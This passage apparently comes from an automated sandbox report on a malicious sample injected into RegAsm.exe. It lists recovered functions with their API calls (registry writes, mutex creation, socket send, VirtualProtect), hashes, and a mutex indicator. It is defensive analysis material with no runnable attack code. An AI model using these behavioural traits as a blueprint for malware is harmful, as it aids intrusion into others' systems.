                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastMutex
                                                                                • String ID: Rmc-4CT19T
                                                                                • API String ID: 1925916568-2159398867
                                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModuleProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2905821283-0
                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventObjectSingleWaitsend
                                                                                • String ID:
                                                                                • API String ID: 3963590051-0
                                                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 3519776433-0
                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 1818849710-0
                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-3916222277
                                                                                • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-3916222277
                                                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: P>4
                                                                                • API String ID: 176396367-4086044778
                                                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2568140703-3893581201
                                                                                • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2568140703-3893581201
                                                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                Strings
                                                                                • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 2593887523-3084827643
                                                                                • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2773662609-671089009
                                                                                • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2773662609-671089009
                                                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2742660187-671089009
                                                                                • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: FlsAlloc
                                                                                • API String ID: 2742660187-671089009
                                                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
